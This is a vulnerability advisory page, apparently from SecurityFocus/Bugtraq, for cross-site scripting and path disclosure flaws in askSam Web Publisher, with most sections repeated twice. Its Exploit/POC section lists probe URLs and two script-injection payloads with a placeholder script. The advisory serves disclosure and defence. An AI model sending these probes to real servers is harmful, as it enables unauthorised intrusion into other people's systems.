askSam Web Publisher Cross Site Scripting Vulnerability
BID:4670
Info
askSam Web Publisher Cross Site Scripting Vulnerability
| Bugtraq ID: | 4670 |
| Class: | Input Validation Error |
| CVE: |
CVE-2002-1727 CVE-2002-1728 |
| Remote: | Yes |
| Local: | No |
| Published: | May 04 2002 12:00AM |
| Updated: | Jan 31 2019 02:00AM |
| Credit: | Posted to BugTraq on May 5, 2002 by frog frog <[email protected]> |
| Vulnerable: |
askSam systems askSam Web Publisher 4.0 |
| Not Vulnerable: | |
Discussion
askSam Web Publisher Cross Site Scripting Vulnerability
askSam is a database system. An optional component, askSam Web Publisher (versions 1 and 4), is reportedly vulnerable to cross site scripting vulnerability in the as_web.exe (or as_web4.exe) component. This is due to a failure to strip script and HTML when returning error messages that include user input.
The same component can also disclose paths on the server when non-existant files are requested.
askSam is a database system. An optional component, askSam Web Publisher (versions 1 and 4), is reportedly vulnerable to cross site scripting vulnerability in the as_web.exe (or as_web4.exe) component. This is due to a failure to strip script and HTML when returning error messages that include user input.
The same component can also disclose paths on the server when non-existant files are requested.
Exploit / POC
askSam Web Publisher Cross Site Scripting Vulnerability
The following examples will display an error message containing the complete path to the askSam directory:
http://somewhere/as_web.exe?Command=search&file=non-existant-file&request=&MaxHits=10&NumLines=1
http://somewhere/as_web.exe?non-existant
http://somewhere/as_web4.exe?Command=First&File=non-existant-file
These examples demonstrate the cross site scripting issue:
/as_web4.exe?existant-ask-file!!.ask+B+&lt;script&gt;ANYSCRIPT&lt;/script&gt;
/as_web.exe?existant-ask-file!!.ask+B+&lt;script&gt;ANYSCRIPT&lt;script&gt;
The following examples will display an error message containing the complete path to the askSam directory:
http://somewhere/as_web.exe?Command=search&file=non-existant-file&request=&MaxHits=10&NumLines=1
http://somewhere/as_web.exe?non-existant
http://somewhere/as_web4.exe?Command=First&File=non-existant-file
These examples demonstrate the cross site scripting issue:
/as_web4.exe?existant-ask-file!!.ask+B+&lt;script&gt;ANYSCRIPT&lt;/script&gt;
/as_web.exe?existant-ask-file!!.ask+B+&lt;script&gt;ANYSCRIPT&lt;script&gt;
Solution / Fix
askSam Web Publisher Cross Site Scripting Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
askSam Web Publisher Cross Site Scripting Vulnerability
References:
References:
- askSam Product Page (askSam systems)